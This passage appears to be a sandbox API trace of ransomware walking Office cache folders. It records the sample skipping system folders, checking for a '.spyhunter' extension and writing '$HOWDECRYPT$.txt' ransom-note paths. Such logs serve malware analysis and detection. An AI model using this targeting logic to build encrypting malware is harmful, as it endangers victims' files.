Users\\{90140000-0018-0409-1000-0000000FF1CE}-C") returned 66 [0081.004] lstrcmpW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0081.004] lstrcmpW (lpString1="{90140000-0018-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0081.004] GetProcessHeap () returned 0x2c0000 [0081.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30ffc8 [0081.004] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*") returned 68 [0081.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x30b530 [0081.094] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.094] lstrlenW (lpString="Windows") returned 7 [0081.094] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.094] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.094] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.094] lstrlenW (lpString="System Volume Information") returned 25 [0081.094] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.094] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.095] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0081.095] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.095] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0081.095] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.095] GetProcessHeap () returned 0x2c0000 [0081.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x30be10 [0081.095] GetProcessHeap () returned 0x2c0000 [0081.095] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x321018, Size=0x280) returned 0x321018 [0081.095] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.095] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.095] lstrlenW (lpString="Windows") returned 7 [0081.095] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.095] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.095] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.095] lstrlenW (lpString="System Volume Information") returned 25 [0081.095] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.095] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.095] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.095] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0081.095] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.095] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0081.095] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.095] GetProcessHeap () returned 0x2c0000 [0081.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x30c530 [0081.095] GetProcessHeap () returned 0x2c0000 [0081.095] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x321018, Size=0x288) returned 0x321018 [0081.096] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.096] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="Windows") returned -1 [0081.096] lstrlenW (lpString="Windows") returned 7 [0081.096] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="$Recycle.bin") returned 1 [0081.096] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.096] lstrcmpiW (lpString1="PowerPointMUI.msi", lpString2="System Volume Information") returned -1 [0081.096] lstrlenW (lpString="System Volume Information") returned 25 [0081.096] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 84 [0081.096] StrStrIW (lpFirst="PowerPointMUI.msi", lpSrch=".spyhunter") returned 0x0 [0081.096] lstrcmpW (lpString1="PowerPointMUI.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.096] lstrcmpW (lpString1="PowerPointMUI.msi", lpString2="_uninstalling_.png") returned 1 [0081.096] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi") returned 84 [0081.096] GetProcessHeap () returned 0x2c0000 [0081.096] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x30c608 [0081.096] GetProcessHeap () returned 0x2c0000 [0081.096] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x321018, Size=0x290) returned 0x321018 [0081.096] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.096] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="Windows") returned -1 [0081.096] lstrlenW (lpString="Windows") returned 7 [0081.096] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="$Recycle.bin") returned 1 [0081.096] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.096] lstrcmpiW (lpString1="PowerPointMUI.xml", lpString2="System Volume Information") returned -1 [0081.096] lstrlenW (lpString="System Volume Information") returned 25 [0081.096] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0081.096] StrStrIW (lpFirst="PowerPointMUI.xml", lpSrch=".spyhunter") returned 0x0 [0081.096] lstrcmpW (lpString1="PowerPointMUI.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.096] lstrcmpW (lpString1="PowerPointMUI.xml", lpString2="_uninstalling_.png") returned 1 [0081.097] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml") returned 84 [0081.097] GetProcessHeap () returned 0x2c0000 [0081.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x3212b0 [0081.097] GetProcessHeap () returned 0x2c0000 [0081.097] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x321018, Size=0x298) returned 0x3213a8 [0081.097] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.097] lstrcmpiW (lpString1="PptLR.cab", lpString2="Windows") returned -1 [0081.097] lstrlenW (lpString="Windows") returned 7 [0081.097] lstrcmpiW (lpString1="PptLR.cab", lpString2="$Recycle.bin") returned 1 [0081.097] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.097] lstrcmpiW (lpString1="PptLR.cab", lpString2="System Volume Information") returned -1 [0081.097] lstrlenW (lpString="System Volume Information") returned 25 [0081.097] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 76 [0081.097] StrStrIW (lpFirst="PptLR.cab", lpSrch=".spyhunter") returned 0x0 [0081.097] lstrcmpW (lpString1="PptLR.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.097] lstrcmpW (lpString1="PptLR.cab", lpString2="_uninstalling_.png") returned 1 [0081.097] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab") returned 76 [0081.097] GetProcessHeap () returned 0x2c0000 [0081.097] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x321018 [0081.097] GetProcessHeap () returned 0x2c0000 [0081.097] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3213a8, Size=0x2a0) returned 0x3213a8 [0081.097] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.097] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0081.097] lstrlenW (lpString="Windows") returned 7 [0081.097] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0081.097] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.097] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0081.097] lstrlenW (lpString="System Volume Information") returned 25 [0081.097] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.098] StrStrIW (lpFirst="Setup.xml", lpSrch=".spyhunter") returned 0x0 [0081.098] lstrcmpW (lpString1="Setup.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.098] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0081.098] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.098] GetProcessHeap () returned 0x2c0000 [0081.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x321100 [0081.098] GetProcessHeap () returned 0x2c0000 [0081.098] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3213a8, Size=0x2a8) returned 0x3213a8 [0081.098] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0081.098] FindClose (in: hFindFile=0x30b530 | out: hFindFile=0x30b530) returned 1 [0081.099] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.099] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.099] GetProcessHeap () returned 0x2c0000 [0081.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x321658 [0081.099] GetProcessHeap () returned 0x2c0000 [0081.099] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3213a8, Size=0x2b0) returned 0x321748 [0081.099] GetProcessHeap () returned 0x2c0000 [0081.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ffc8 | out: hHeap=0x2c0000) returned 1 [0081.099] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0081.099] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0081.099] lstrlenW (lpString="Windows") returned 7 [0081.099] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0081.099] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.099] lstrcmpiW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0081.099] lstrlenW (lpString="System Volume Information") returned 25 [0081.099] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C") returned 66 [0081.099] lstrcmpW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0081.099] lstrcmpW (lpString1="{90140000-0019-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0081.099] GetProcessHeap () returned 0x2c0000 [0081.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30ffc8 [0081.099] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*") returned 68 [0081.100] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x30b530 [0081.199] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.199] lstrlenW (lpString="Windows") returned 7 [0081.199] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.199] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.199] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.199] lstrlenW (lpString="System Volume Information") returned 25 [0081.199] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.199] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.199] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0081.199] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.199] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0081.199] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.199] GetProcessHeap () returned 0x2c0000 [0081.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x321a00 [0081.199] GetProcessHeap () returned 0x2c0000 [0081.199] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x321748, Size=0x2b8) returned 0x321ad8 [0081.199] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.199] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.199] lstrlenW (lpString="Windows") returned 7 [0081.199] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.199] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.199] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.199] lstrlenW (lpString="System Volume Information") returned 25 [0081.199] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.200] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.200] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.200] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0081.200] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.200] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0081.200] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.200] GetProcessHeap () returned 0x2c0000 [0081.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x321d98 [0081.200] GetProcessHeap () returned 0x2c0000 [0081.200] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x321ad8, Size=0x2c0) returned 0x321e70 [0081.200] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.200] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="Windows") returned -1 [0081.200] lstrlenW (lpString="Windows") returned 7 [0081.200] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="$Recycle.bin") returned 1 [0081.200] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.200] lstrcmpiW (lpString1="PublisherMUI.msi", lpString2="System Volume Information") returned -1 [0081.200] lstrlenW (lpString="System Volume Information") returned 25 [0081.200] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 83 [0081.200] StrStrIW (lpFirst="PublisherMUI.msi", lpSrch=".spyhunter") returned 0x0 [0081.200] lstrcmpW (lpString1="PublisherMUI.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.200] lstrcmpW (lpString1="PublisherMUI.msi", lpString2="_uninstalling_.png") returned 1 [0081.200] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 83 [0081.200] GetProcessHeap () returned 0x2c0000 [0081.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x321748 [0081.200] GetProcessHeap () returned 0x2c0000 [0081.200] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x321e70, Size=0x2c8) returned 0x321e70 [0081.200] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.201] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="Windows") returned -1 [0081.201] lstrlenW (lpString="Windows") returned 7 [0081.201] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="$Recycle.bin") returned 1 [0081.201] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.201] lstrcmpiW (lpString1="PublisherMUI.xml", lpString2="System Volume Information") returned -1 [0081.201] lstrlenW (lpString="System Volume Information") returned 25 [0081.201] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0081.201] StrStrIW (lpFirst="PublisherMUI.xml", lpSrch=".spyhunter") returned 0x0 [0081.201] lstrcmpW (lpString1="PublisherMUI.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.201] lstrcmpW (lpString1="PublisherMUI.xml", lpString2="_uninstalling_.png") returned 1 [0081.201] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml") returned 83 [0081.201] GetProcessHeap () returned 0x2c0000 [0081.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x321838 [0081.201] GetProcessHeap () returned 0x2c0000 [0081.201] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x321e70, Size=0x2d0) returned 0x321e70 [0081.201] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.201] lstrcmpiW (lpString1="PubLR.cab", lpString2="Windows") returned -1 [0081.201] lstrlenW (lpString="Windows") returned 7 [0081.201] lstrcmpiW (lpString1="PubLR.cab", lpString2="$Recycle.bin") returned 1 [0081.201] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.201] lstrcmpiW (lpString1="PubLR.cab", lpString2="System Volume Information") returned -1 [0081.201] lstrlenW (lpString="System Volume Information") returned 25 [0081.201] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 76 [0081.201] StrStrIW (lpFirst="PubLR.cab", lpSrch=".spyhunter") returned 0x0 [0081.201] lstrcmpW (lpString1="PubLR.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.201] lstrcmpW (lpString1="PubLR.cab", lpString2="_uninstalling_.png") returned 1 [0081.201] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab") returned 76 [0081.201] GetProcessHeap () returned 0x2c0000 [0081.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x321ad8 [0081.201] GetProcessHeap () returned 0x2c0000 [0081.201] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x321e70, Size=0x2d8) returned 0x321e70 [0081.201] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.201] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0081.202] lstrlenW (lpString="Windows") returned 7 [0081.202] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0081.202] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.202] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0081.202] lstrlenW (lpString="System Volume Information") returned 25 [0081.202] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.202] StrStrIW (lpFirst="Setup.xml", lpSrch=".spyhunter") returned 0x0 [0081.202] lstrcmpW (lpString1="Setup.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.202] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0081.202] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0081.202] GetProcessHeap () returned 0x2c0000 [0081.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x321bc0 [0081.202] GetProcessHeap () returned 0x2c0000 [0081.202] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x321e70, Size=0x2e0) returned 0x321e70 [0081.202] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0081.202] FindClose (in: hFindFile=0x30b530 | out: hFindFile=0x30b530) returned 1 [0081.203] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.203] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0081.203] GetProcessHeap () returned 0x2c0000 [0081.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x321ca8 [0081.203] GetProcessHeap () returned 0x2c0000 [0081.203] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x321e70, Size=0x2e8) returned 0x321e70 [0081.203] GetProcessHeap () returned 0x2c0000 [0081.203] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ffc8 | out: hHeap=0x2c0000) returned 1 [0081.203] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0081.203] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0081.203] lstrlenW (lpString="Windows") returned 7 [0081.203] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0081.203] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.203] lstrcmpiW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0081.203] lstrlenW (lpString="System Volume Information") returned 25 [0081.203] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C") returned 66 [0081.203] lstrcmpW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0081.203] lstrcmpW (lpString1="{90140000-001A-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0081.203] GetProcessHeap () returned 0x2c0000 [0081.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30ffc8 [0081.204] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*") returned 68 [0081.204] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x30b530 [0081.380] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.380] lstrlenW (lpString="Windows") returned 7 [0081.380] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.380] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.380] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.380] lstrlenW (lpString="System Volume Information") returned 25 [0081.380] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.380] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.380] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0081.381] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.381] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0081.381] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\.") returned 68 [0081.381] GetProcessHeap () returned 0x2c0000 [0081.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x321928 [0081.381] GetProcessHeap () returned 0x2c0000 [0081.381] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x321e70, Size=0x2f0) returned 0x321e70 [0081.381] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.381] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.381] lstrlenW (lpString="Windows") returned 7 [0081.381] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.381] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.381] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.381] lstrlenW (lpString="System Volume Information") returned 25 [0081.381] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.381] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.381] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.381] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0081.381] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0081.381] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0081.381] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\..") returned 69 [0081.381] GetProcessHeap () returned 0x2c0000 [0081.381] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x322168 [0081.381] GetProcessHeap () returned 0x2c0000 [0081.381] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x321e70, Size=0x2f8) returned 0x322240 [0081.381] FindNextFileW (in: hFindFile=0x30b530, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0081.382] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="Windows") returned -1 [0081.382] lstrlenW (lpString="Windows") returned 7 [0081.382] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="$Recycle.bin") returned 1 [0081.382] lstrlenW (lpString="$Recycle.bin") returned 12 [0081.382] lstrcmpiW (lpString1="OutlkLR.cab", lpString2="System Volume Information") returned -1 [0081.382] lstrlenW (lpString="System Volume Information") returned 25 [0081.382] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab") returned 78 [0081.382] StrStrIW (lpFirst="OutlkLR.cab", lpSrch=".spyhunter") returned 0x0 